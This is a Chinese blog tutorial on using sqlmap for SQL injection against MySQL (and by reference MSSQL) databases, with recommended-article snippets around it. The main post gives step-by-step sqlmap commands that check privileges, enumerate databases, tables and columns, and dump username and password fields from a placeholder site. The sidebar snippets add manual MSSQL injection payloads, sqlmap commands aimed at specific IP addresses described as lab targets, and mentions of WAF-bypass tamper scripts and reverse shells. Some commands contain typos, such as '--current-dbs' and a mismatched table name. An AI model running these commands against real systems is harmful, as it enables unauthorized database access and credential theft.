Sqlmap基础(二)之Mysql和Mssql的注入

最新推荐文章于 2024-05-05 19:50:21 发布
最新推荐文章于 2024-05-05 19:50:21 发布
阅读量544 收藏 1
点赞数 1
分类专栏: 渗透 文章标签: sqlmap的使用 网络安全 渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43822735/article/details/102884563
版权

Mysql数据库的注入
测试注入点:http://bbb.com/view.asp?id=1
sqlmap.py –u “http://aaa.com/view.asp?id=1”测试后发现是mysql数据库。
常用指令:is-dba当前用户是否有权限
dbs 查询所有数据库
current-db 网站当前数据库
users 所有数据库用户
current-user当前数据库用户
第一步:sqlmap.py –u “http://aaa.com/view.asp?id=1” --is-dba查询是否有权限查询数据库
第二步:sqlmap.py –u “http://aaa.com/view.asp?id=1” --dbs 查询所有数据库
第三步:sqlmap.py –u “http://aaa.com/view.asp?id=1” --current-dbs查询当前网站所用的数据库名
第四步:开始注入sqlmap.py –u “http://aaa.com/view.asp?id=1” --tables –D “abc” (假设当前数据库名abc)
第五步:获取表名asd后,开始获取字段名sqlmap.py –u “http://aaa.com/view.asp?id=1” --columns –T “asc” –D “abc”
第六步:获取字段后,准备获取用户名字段和密码字段的数据
sqlmap.py –u “http://aaa.com/view.asp?id=1” --dump -C”user,passwd” –T “asc” –D “abc”

Mssql数据库的注入
与mysql数据库注入类似,如有疑问见mysql数据库的注入。

GIT_CH
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MSSQLMYSQL手工注入时的简单对比
MyBack
06-03 1057
当网站是access或mssql时, 一们一般是猜表名开始: http://www.test.com/test.asp?id=1 and exists(select * from 要猜的表名) 当猜出表名时, 我们再猜字段: http://www.test.com/test.asp?id=1 and exists(select 要猜的字段 from 猜对的表名) 当以上两步
SQLMap之Tamper.docx
09-26
SQLMap之Tamper SQLMap 是一个功能强大的 SQL 注入攻击工具,它提供了 tamper 脚本来帮助攻击者绕过应用程序的敏感字符过滤和 WAF 规则的阻挡,从而进行渗透攻击。tamper 脚本可以在一定程度上避开应用程序的敏感...
SQLMAP渗透笔记之MSSQL数据库注入
Birdman-one的博客
12-26 4186
---------------------------------------------------------------------------------------------                 SQLMAP渗透笔记之MSSQL数据库注入                                  ------------------------
2024年最全Sqlmap使用教程【个人笔记精华整理】(2),2024年最新2024网络安全网络编程总结篇
最新发布
2401_84252281的博客
05-05 857
1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。4、联合查询注入,可以使用union的情况下的注入。5、堆查询注入,可以同时执行多条语句的执行时的注入
SQL注入SQLmap入门
IT-Blog
01-09 2190
sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了。现在支持python3了 基本参数 is-dba 当前用户权限 dbs 所有数据库 current-db 当前数据库 users 所有用户 current-user 当前用户 --tables ...
Mssql注入
时光凉春衫薄的博客
02-26 3140
Mssql注入 获取数据库信息 Id=1 and 1=(select @@version) 获取当前数据库名称 Id=1 and 1=(select db_name()) 获取用户数据库名称 And 1 =(select top 1 name from master..sysdatabases where dbid>4) 获取下一个用户数据库 And 1 =(select...
数据库
技术学习
12-03 140
Oracle MySQL DB2 Sybase NoSQL Sqlite MS SQL ACCESS
SQLMAP注入使用
05-13
SQLMAP是一款强大的注入工具,相比经典的啊D和明小子之类的注入工具,SQLmap更加强大,无论是自带字典,功能还是界面优化,都是一款非常不错的注入工具。sqlmap可以多平台运行,windows,linux下都可以进行access,...
Havij1.14 SQL注入工具 asp php jsp mssql mysql
04-09
标题 "Havij1.14 SQL注入工具 asp php jsp mssql mysql" 提到的是一个名为Havij 1.14的工具,它主要用于检测和利用SQL注入漏洞。SQL注入是一种常见的网络安全问题,攻击者通过在输入字段中插入恶意SQL代码,以获取、...
sqlmap 自动化的SQL注入工具
01-01
1、完全支持MySQL、Oracle、PostgreSQL、MSSQL、Access、IBM DB2、SQLite、Firebird、Sybase、SAP MaxDB、HSQLDB和Informix等多种数据库管理系统。 2、完全支持布尔型盲注、时间型盲注、基于错误信息的注入、联合...
总结一些SqlMap的常用tamper脚本释义.docx
02-02
SqlMap 是一个功能强大且广泛使用SQL 注入检测工具,它提供了多种 tamper 脚本来帮助用户绕过 Web 应用防火墙(WAF)和入侵检测系统(IDS),从而实现对网站漏洞的检测和利用。下面是常用的 SqlMap tamper 脚本...
详解强大的SQL注入工具——SQLMAP
05-09
这是一个审计数据库安全的SQL注入工具的使用指南, 该工具在windows平台与linux平台下均可以使用数据库管理员(DBA)可用它来检 验自己的数据库是否存在安全配置方面的漏洞。
sqlmap-1.3.9最新完整版.zip
09-16
亲爱的朋友,SQLMAP是自动化的SQL注入数据库接管工具,是开源的渗透测试工具,它能自动检测和利用SQL注入漏洞并接管数据库服务器。它配备了强大的检测引擎、最终渗透测试器的许多利基特性和广泛的开关,从数据库指纹、从数据库获取数据到通过带外连接访问底层文件系统和在操作系统上执行命令。这是本人从sqlmap上下载来的最新版本sqlmap,没有作任何修改,只是方便各位网友快速下载得到工具(毕竟人家服务器架在国外,下载起来花了我五分钟)
sqlmap 连接mysql_sqlmap连接Mysql实现getshell | CN-SEC 中文网
weixin_29023349的博客
01-19 398
摘要首先得知道这个玩意,sqlmap -help,不说大家也懂搜嘎. 语法为:” DBMS://USER:[emailprotected]_IP:DBMS_PORT/DATABASE_NAME” 或者是”DBMS://DATABASE_FILEPATH”。0x01首先得知道这个玩意,sqlmap -help,不说大家也懂搜嘎.语法为:" DBMS://USER:[emailprotecte...
aspx+mssql注入:Sqlmap
zh的博客
10-16 485
靶场地址:http://61.136.208.14:8001/ 解题准备:Sqlmap 解题思路: 1、使用工具尝试注入 sqlmap -u "http://61.136.208.14:8001/Content.aspx?ClassId=1&id=4" --dbs --batch 2、库名 3、表名 sqlmap -u "http://61.136.208.14:8001/Content.aspx?ClassId=1&id=4" -D dznews --tables..
内网渗透模拟演练:使用sqlmap对内网mssql提权与反弹shell
zh的博客
10-24 3932
准备:假设内网有一台2003服务器(使用mssql数据库),把网页服务80端口映射到防火墙8092端口,外网一台centos用来接收反弹shell 工具:sqlmap、msf、apache sqlmap进行注入 测试页面存在注入使用sqlmap进行注入 sqlmap -u "http://61.136.208.30:8092/Content.aspx?ClassId=1&id=4" -p "id" --dbms "mssql" 注入成功,获取到了服务器信息
sqlmap普通注入之mssql注入
边城浪子的博客
09-22 1471
1.判断注入点,获取网站信息 sqlmap.py -u http://www.xx.com/ss.asp?id=123 例: sqlmap.py -u “http://www.xx.com/ss.asp?id=123” 2.获取所有数据库 sqlmap.py -u http://www.xx.com/ss.asp?id=123 –dbs 例: sqlmap.py -u “http:/...
转载 一个小时学会MySQL数据库(4)
Museions的开心博客
04-11 545
常用的SQL,常用的数据库操作语句...
sql注入sqlmap
Zf_008的博客
01-21 265
sqlmap中文手册-sql注入自动化测试工具
07-19
SQLMap是一款强大的、自动化的SQL注入工具,主要用于检测和利用网站应用程序中的SQL注入漏洞。它能够帮助安全测试人员有效地发现和利用数据库漏洞,从而提高Web安全审计的效率。这款工具是免费且开源的,适用于各种...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值